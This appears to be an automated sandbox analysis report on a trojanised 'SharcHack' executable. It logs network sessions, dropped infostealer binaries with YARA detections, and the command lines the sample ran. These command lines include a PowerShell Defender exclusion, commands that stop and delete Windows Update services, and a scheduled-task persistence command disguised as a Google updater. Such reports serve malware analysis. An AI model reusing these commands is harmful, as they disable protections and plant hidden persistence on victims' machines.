                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                    Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3
                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                                                                    Content-Length: 457
                                                                                                                                                                                                                                    Host: d31tu1fsc224h4.cloudfront.net
                                                                                                                                                                                                                                    2024-12-28 21:21:49 UTC457OUTData Raw: 7b 22 64 61 74 61 22 3a 20 5b 7b 22 73 6f 75 72 63 65 22 3a 20 22 70 6c 61 74 66 6f 72 6d 22 2c 20 22 65 76 65 6e 74 22 3a 20 22 7a 62 5f 61 6e 61 6c 79 74 69 63 73 22 2c 20 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 20 22 70 72 6f 64 75 63 74 69 6f 6e 22 20 2c 20 22 63 72 65 61 74 65 64 5f 61 74 22 3a 31 37 33 35 34 32 30 38 37 30 30 30 30 2c 20 22 76 65 72 73 69 6f 6e 22 3a 20 22 31 2e 30 2e 30 22 2c 20 22 70 72 6f 70 65 72 74 69 65 73 22 3a 20 7b 22 30 22 3a 22 22 2c 22 31 22 3a 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 2c 22 32 22 3a 22 32 30 32 34 31 32 32 38 31 36 32 30 31 30 22 2c 22 33 22 3a 22 63 68 65 61 74 65 6e 67 69 6e 65 22 2c 22 34 22 3a 22 63 68 65 61 74 65 6e 67 69 6e
                                                                                                                                                                                                                                    Data Ascii: {"data": [{"source": "platform", "event": "zb_analytics", "environment": "production" , "created_at":1735420870000, "version": "1.0.0", "properties": {"0":"","1":"9e146be9-c76a-4720-bcdb-53011b87bd06","2":"20241228162010","3":"cheatengine","4":"cheatengin
                                                                                                                                                                                                                                    2024-12-28 21:21:50 UTC395INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                    Date: Sat, 28 Dec 2024 21:21:49 GMT
                                                                                                                                                                                                                                    Via: 1.1 56455cfd91a1942216b3c22ed923150c.cloudfront.net (CloudFront), 1.1 6bdd3bc55276e6cf4b6e1b9d02e6e464.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                    X-Amz-Cf-Pop: CDG52-P4
                                                                                                                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                    X-Amz-Cf-Pop: CDG52-P3
                                                                                                                                                                                                                                    X-Amz-Cf-Id: pqTAiOWVE6csLTOZwIeEFaZ24OiB_BcgPC1sOPdeVK4R2Km0iBpmPw==


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    26192.168.2.54994365.9.108.934436476C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-12-28 21:21:58 UTC311OUTPOST /zbd HTTP/1.1
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                    Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3
                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                                                                    Content-Length: 357
                                                                                                                                                                                                                                    Host: d34hwk9wxgk5fi.cloudfront.net
                                                                                                                                                                                                                                    2024-12-28 21:21:58 UTC357OUTData Raw: 7b 22 74 61 62 6c 65 22 3a 22 7a 62 5f 61 6e 61 6c 79 74 69 63 73 22 2c 22 64 61 74 61 22 3a 22 7b 5c 22 30 5c 22 3a 5c 22 5c 22 2c 5c 22 31 5c 22 3a 5c 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 5c 22 2c 5c 22 32 5c 22 3a 5c 22 32 30 32 34 31 32 32 38 31 36 32 30 31 30 5c 22 2c 5c 22 33 5c 22 3a 5c 22 63 68 65 61 74 65 6e 67 69 6e 65 5c 22 2c 5c 22 34 5c 22 3a 5c 22 63 68 65 61 74 65 6e 67 69 6e 65 5c 22 2c 5c 22 35 5c 22 3a 5c 22 d0 a1 68 65 61 74 d0 95 6e 67 69 6e 65 5c 22 2c 5c 22 31 38 5c 22 3a 5c 22 5c 22 2c 5c 22 31 39 5c 22 3a 5c 22 70 61 63 5f 32 34 31 30 30 37 5c 22 2c 5c 22 32 31 5c 22 3a 5c 22 31 37 30 37 67 64 69 70 5c 22 2c 5c 22 36 5c 22 3a 5c 22 33 5c 22 2c 5c 22 37 5c 22
                                                                                                                                                                                                                                    Data Ascii: {"table":"zb_analytics","data":"{\"0\":\"\",\"1\":\"9e146be9-c76a-4720-bcdb-53011b87bd06\",\"2\":\"20241228162010\",\"3\":\"cheatengine\",\"4\":\"cheatengine\",\"5\":\"heatngine\",\"18\":\"\",\"19\":\"pac_241007\",\"21\":\"1707gdip\",\"6\":\"3\",\"7\"
                                                                                                                                                                                                                                    2024-12-28 21:21:59 UTC427INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                    Content-Length: 15
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Date: Sat, 28 Dec 2024 21:21:59 GMT
                                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                    Via: 1.1 56706a0e74c90535106878a6a2f1475c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                    X-Amz-Cf-Pop: TLV50-C2
                                                                                                                                                                                                                                    X-Amz-Cf-Id: dPzkLpy-497r_6POhQg6xJwh8RP9XJoEHvgJB8GUDGX3U59mm0iRtA==
                                                                                                                                                                                                                                    2024-12-28 21:21:59 UTC15INData Raw: 7b 22 53 74 61 74 75 73 22 3a 22 4f 4b 22 7d
                                                                                                                                                                                                                                    Data Ascii: {"Status":"OK"}


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    27192.168.2.5499513.165.135.34436476C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-12-28 21:22:01 UTC308OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                    Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3
                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                                                                    Content-Length: 416
                                                                                                                                                                                                                                    Host: d31tu1fsc224h4.cloudfront.net
                                                                                                                                                                                                                                    2024-12-28 21:22:01 UTC416OUTData Raw: 7b 22 64 61 74 61 22 3a 20 5b 7b 22 73 6f 75 72 63 65 22 3a 20 22 70 6c 61 74 66 6f 72 6d 22 2c 20 22 65 76 65 6e 74 22 3a 20 22 7a 62 5f 61 6e 61 6c 79 74 69 63 73 22 2c 20 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 20 22 70 72 6f 64 75 63 74 69 6f 6e 22 20 2c 20 22 63 72 65 61 74 65 64 5f 61 74 22 3a 31 37 33 35 34 32 30 38 37 30 30 30 30 2c 20 22 76 65 72 73 69 6f 6e 22 3a 20 22 31 2e 30 2e 30 22 2c 20 22 70 72 6f 70 65 72 74 69 65 73 22 3a 20 7b 22 30 22 3a 22 22 2c 22 31 22 3a 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 2c 22 32 22 3a 22 32 30 32 34 31 32 32 38 31 36 32 30 31 30 22 2c 22 33 22 3a 22 63 68 65 61 74 65 6e 67 69 6e 65 22 2c 22 34 22 3a 22 63 68 65 61 74 65 6e 67 69 6e
                                                                                                                                                                                                                                    Data Ascii: {"data": [{"source": "platform", "event": "zb_analytics", "environment": "production" , "created_at":1735420870000, "version": "1.0.0", "properties": {"0":"","1":"9e146be9-c76a-4720-bcdb-53011b87bd06","2":"20241228162010","3":"cheatengine","4":"cheatengin
                                                                                                                                                                                                                                    2024-12-28 21:22:02 UTC395INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                    Date: Sat, 28 Dec 2024 21:22:01 GMT
                                                                                                                                                                                                                                    Via: 1.1 49f259fbf0878ade02febf4980fecb18.cloudfront.net (CloudFront), 1.1 fa05633741160f5d7fda4a3fc2b1f1b0.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                    X-Amz-Cf-Pop: CDG52-P4
                                                                                                                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                    X-Amz-Cf-Pop: CDG52-P3
                                                                                                                                                                                                                                    X-Amz-Cf-Id: 7yxW59bq2K1T4Rf2MQjPLh-SKSAb3GIXCklJHNRSyy7aepVFLB489g==


                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                                                    Start time:16:19:56
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\SharcHack.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\SharcHack.exe"
                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                    File size:41'879'040 bytes
                                                                                                                                                                                                                                    MD5 hash:796310542E9FB2886DE3F8CBDF88C9FA
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:2
                                                                                                                                                                                                                                    Start time:16:19:56
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\3.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\3.exe"
                                                                                                                                                                                                                                    Imagebase:0x7ff69af10000
                                                                                                                                                                                                                                    File size:3'715'584 bytes
                                                                                                                                                                                                                                    MD5 hash:A4C45AAF11FC601009A5682FD23790EE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                                                                    Start time:16:19:57
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                                                                                                                                                    Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                                                                    Start time:16:19:57
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                                                                    Start time:16:19:57
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe"
                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                    File size:8'068'096 bytes
                                                                                                                                                                                                                                    MD5 hash:9F4F298BCF1D208BD3CE3907CFB28480
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                    • Rule: JoeSecurity_NitroStealer, Description: Yara detected Nitro Stealer, Source: 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_BlackGuard, Description: Yara detected BlackGuard, Source: 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_VEGAStealer, Description: Yara detected VEGA Stealer, Source: 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_AdesStealer, Description: Yara detected Ades Stealer, Source: 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                    • Detection: 100%, ReversingLabs
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                                                                    Start time:16:20:00
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\CheatEngine75.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\CheatEngine75.exe"
                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                    File size:30'016'928 bytes
                                                                                                                                                                                                                                    MD5 hash:CCEF241F10766A2E12298FBA4D319450
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:Borland Delphi
                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                                                                    • Detection: 43%, ReversingLabs
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                                                    Start time:16:20:00
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\v2.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\v2.exe"
                                                                                                                                                                                                                                    Imagebase:0xaa0000
                                                                                                                                                                                                                                    File size:278'016 bytes
                                                                                                                                                                                                                                    MD5 hash:3F62213D184B639A0A62BCB1E65370A8
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                    • Rule: JoeSecurity_VEGAStealer, Description: Yara detected VEGA Stealer, Source: 00000007.00000002.2163857464.00000000031A6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_NitroStealer, Description: Yara detected Nitro Stealer, Source: 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_BlackGuard, Description: Yara detected BlackGuard, Source: 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_VEGAStealer, Description: Yara detected VEGA Stealer, Source: 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_AdesStealer, Description: Yara detected Ades Stealer, Source: 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                    • Rule: JoeSecurity_BlackGuard, Description: Yara detected BlackGuard, Source: 00000007.00000002.2163857464.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_VEGAStealer, Description: Yara detected VEGA Stealer, Source: 00000007.00000002.2163857464.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_VEGAStealer, Description: Yara detected VEGA Stealer, Source: 00000007.00000002.2163857464.00000000031FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2163857464.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.2163857464.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000007.00000002.2163857464.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                    • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_NitroStealer, Description: Yara detected Nitro Stealer, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_BlackGuard, Description: Yara detected BlackGuard, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_VEGAStealer, Description: Yara detected VEGA Stealer, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_AdesStealer, Description: Yara detected Ades Stealer, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: infostealer_win_lighting, Description: Detect the Lighting infostealer based on specific strings, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: Sekoia.io
                                                                                                                                                                                                                                    • Rule: infostealer_win_stormkitty, Description: Finds StormKitty samples (or their variants) based on specific strings, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: Sekoia.io
                                                                                                                                                                                                                                    • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: ditekSHen
                                                                                                                                                                                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: ditekSHen
                                                                                                                                                                                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infosteslers, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: ditekSHen
                                                                                                                                                                                                                                    • Rule: MALWARE_Win_A310Logger, Description: Detects A310Logger, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: ditekSHen
                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                    • Detection: 83%, ReversingLabs
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                                                                    Start time:16:20:02
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp" /SL5="$50416,29079073,832512,C:\Users\user\AppData\Local\Temp\CheatEngine75.exe"
                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                    File size:3'210'656 bytes
                                                                                                                                                                                                                                    MD5 hash:E652D75D1D0D3F03B6B730E064E9194C
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:Borland Delphi
                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                    • Detection: 3%, ReversingLabs
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                    Target ID:10
                                                                                                                                                                                                                                    Start time:16:20:10
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                                                                                                                                                                                                    Imagebase:0x7ff74e4d0000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:11
                                                                                                                                                                                                                                    Start time:16:20:10
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                                                                                                                                                                                    Imagebase:0x7ff74e4d0000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:12
                                                                                                                                                                                                                                    Start time:16:20:10
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:13
                                                                                                                                                                                                                                    Start time:16:20:10
                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
                                                                                                                                                                                                                                    Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
